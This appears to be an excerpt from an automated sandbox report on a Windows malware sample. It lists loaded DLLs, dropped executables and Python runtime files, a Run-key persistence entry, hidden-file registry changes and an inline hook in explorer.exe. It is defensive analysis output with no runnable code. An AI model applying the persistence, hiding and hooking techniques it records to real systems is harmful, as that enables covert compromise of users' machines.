                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeSection loaded: libffi-7.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\audiodg.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\audiodg.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\audiodg.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\audiodg.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\audiodg.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dll
                    Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dll
                    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
                    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dll
                    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InProcServer32Jump to behavior
                    Source: m5804Te9Uw.exeStatic PE information: Image base 0x140000000 > 0x60000000
                    Source: m5804Te9Uw.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1473564220.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1474211536.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: 5B34.tmp.zx.exe, 0000000F.00000003.1468347235.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1469497436.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1468690442.000002271234F000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.15.dr
                    Source: Binary string: ucrtbase.pdb source: 5B34.tmp.zx.exe, 00000010.00000002.1503509071.00007FF821D65000.00000002.00000001.01000000.0000000A.sdmp
                    Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1470639846.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1469170594.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1468185228.000002271234F000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.15.dr
                    Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1472486975.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1473307417.000002271234F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.15.dr
                    Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1474398082.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: 5B34.tmp.zx.exe, 00000010.00000002.1503772095.00007FF838B71000.00000002.00000001.01000000.0000000D.sdmp, _ctypes.pyd.15.dr
                    Source: Binary string: System.ServiceModel.pdbM source: 2FDD.tmp.ssg.exe, 00000009.00000002.1563736477.0000000000893000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1469998657.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1472768414.000002271234F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.15.dr
                    Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1472179361.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1467567529.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1473175992.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1469281301.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: vcruntime140.amd64.pdbGCTL source: 5B34.tmp.zx.exe, 0000000F.00000003.1466980210.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 00000010.00000002.1503915933.00007FF838B8E000.00000002.00000001.01000000.0000000C.sdmp
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1471540629.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1468905252.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ServiceModel.pdb693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32werShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VSF{ source: 2FDD.tmp.ssg.exe, 00000009.00000002.1578947038.0000000005DA8000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1469382930.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1473051099.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1479405567.000002271234F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.15.dr
                    Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1471791567.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: ucrtbase.pdbUGP source: 5B34.tmp.zx.exe, 00000010.00000002.1503509071.00007FF821D65000.00000002.00000001.01000000.0000000A.sdmp
                    Source: Binary string: vcruntime140.amd64.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1466980210.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 00000010.00000002.1503915933.00007FF838B8E000.00000002.00000001.01000000.0000000C.sdmp
                    Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1475003812.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1469853678.000002271234F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.15.dr
                    Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1472338208.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1471406711.000002271234F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.15.dr
                    Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1469030225.000002271234F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.15.dr
                    Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1472917805.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: 5B34.tmp.zx.exe, 00000010.00000002.1502931530.00007FF8208FD000.00000002.00000001.01000000.0000000B.sdmp
                    Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1470411305.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1468347235.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1473757225.000002271234F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.15.dr
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1471673096.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1471282238.000002271234F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.15.dr
                    Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1475221176.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1471929905.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1472628734.000002271234F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.15.dr
                    Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1472046317.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1469619006.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1474064387.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1470275647.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1470146693.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1480543968.0000022712359000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1473423503.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: 5B34.tmp.zx.exe, 0000000F.00000003.1474753220.000002271234F000.00000004.00000020.00020000.00000000.sdmp
                    Source: 2FDD.tmp.ssg.exe.7.drStatic PE information: 0xD22848DC [Tue Sep 23 12:17:32 2081 UTC]
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeCode function: 3_2_00007FF7F73E14EC LoadLibraryA,GetProcAddress,3_2_00007FF7F73E14EC
                    Source: m5804Te9Uw.exeStatic PE information: section name: .x64
                    Source: 443320E440F81953448019.exe.3.drStatic PE information: section name: .x64
                    Source: 6556.tmp.update.exe.7.drStatic PE information: section name: .x64
                    Source: libcrypto-1_1.dll.15.drStatic PE information: section name: .00cfg
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeCode function: 3_2_00007FF7F73EEC71 push rcx; iretd 3_2_00007FF7F73EEC72
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeCode function: 3_2_00007FF7F73EEA72 push rbp; iretd 3_2_00007FF7F73EEA73
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeCode function: 3_2_00007FF7F73EEC20 push 00000041h; ret 3_2_00007FF7F73EEC24
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeCode function: 3_2_00007FF7F73EEC09 push rbp; iretd 3_2_00007FF7F73EEC0A
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_00007FF7DF22EC20 push 00000041h; ret 4_2_00007FF7DF22EC24
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_00007FF7DF22EC71 push rcx; iretd 4_2_00007FF7DF22EC72
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_00007FF7DF22EA72 push rbp; iretd 4_2_00007FF7DF22EA73
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_00007FF7DF22EC09 push rbp; iretd 4_2_00007FF7DF22EC0A
                    Source: C:\Windows\explorer.exeCode function: 7_2_08A29608 push ebp; iretd 7_2_08A2960F
                    Source: C:\Windows\explorer.exeCode function: 7_2_0AE59608 push ebp; iretd 7_2_0AE5960F
                    Source: C:\Windows\explorer.exeCode function: 7_2_0B319608 push ebp; iretd 7_2_0B31960F
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeCode function: 9_2_06B65300 push eax; retf 9_2_06B65325
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeCode function: 9_2_06B64A99 push eax; retf 9_2_06B64AD1
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeCode function: 10_2_00007FF72A02EC20 push 00000041h; ret 10_2_00007FF72A02EC24
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeCode function: 10_2_00007FF72A02EC71 push rcx; iretd 10_2_00007FF72A02EC72
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeCode function: 10_2_00007FF72A02EA72 push rbp; iretd 10_2_00007FF72A02EA73
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeCode function: 10_2_00007FF72A02EC09 push rbp; iretd 10_2_00007FF72A02EC0A
                    Source: C:\Windows\System32\audiodg.exeCode function: 12_2_00007FF6DAB8EC09 push rbp; iretd 12_2_00007FF6DAB8EC0A
                    Source: C:\Windows\System32\audiodg.exeCode function: 12_2_00007FF6DAB8EC20 push 00000041h; ret 12_2_00007FF6DAB8EC24
                    Source: C:\Windows\System32\audiodg.exeCode function: 12_2_00007FF6DAB8EC71 push rcx; iretd 12_2_00007FF6DAB8EC72
                    Source: C:\Windows\System32\audiodg.exeCode function: 12_2_00007FF6DAB8EA72 push rbp; iretd 12_2_00007FF6DAB8EA73
                    Source: C:\Windows\System32\msiexec.exeCode function: 13_2_00007FF65D6FEA72 push rbp; iretd 13_2_00007FF65D6FEA73
                    Source: C:\Windows\System32\msiexec.exeCode function: 13_2_00007FF65D6FEC71 push rcx; iretd 13_2_00007FF65D6FEC72
                    Source: C:\Windows\System32\msiexec.exeCode function: 13_2_00007FF65D6FEC20 push 00000041h; ret 13_2_00007FF65D6FEC24
                    Source: C:\Windows\System32\msiexec.exeCode function: 13_2_00007FF65D6FEC09 push rbp; iretd 13_2_00007FF65D6FEC0A
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CE0200 push rdi; ret 16_2_00007FF821CE0206
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CDA5B5 push rdi; ret 16_2_00007FF821CDA5BB
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CDFAED push rdi; ret 16_2_00007FF821CDFAF4
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF821CDA096 push rdi; ret 16_2_00007FF821CDA0A2
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeCode function: 16_2_00007FF838B8CB1B push rbp; retf 16_2_00007FF838B8CB28
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\ucrtbase.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\_ctypes.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\VCRUNTIME140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\libffi-7.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6556.tmp.update.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeFile created: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\_hashlib.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\_lzma.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\_bz2.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\select.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\unicodedata.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\python38.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\_socket.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI5602\libcrypto-1_1.dllJump to dropped file
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ServicesJump to behavior
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ServicesJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Changes the view of files in windows explorer (hidden files and folders)
                    Source: C:\Windows\System32\audiodg.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced HiddenJump to behavior
                    Modifies the prolog of user mode functions (user mode inline hooks)
                    Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessInternalW new code: 0xE9 0x90 0x00 0x07 0x75 0x5E
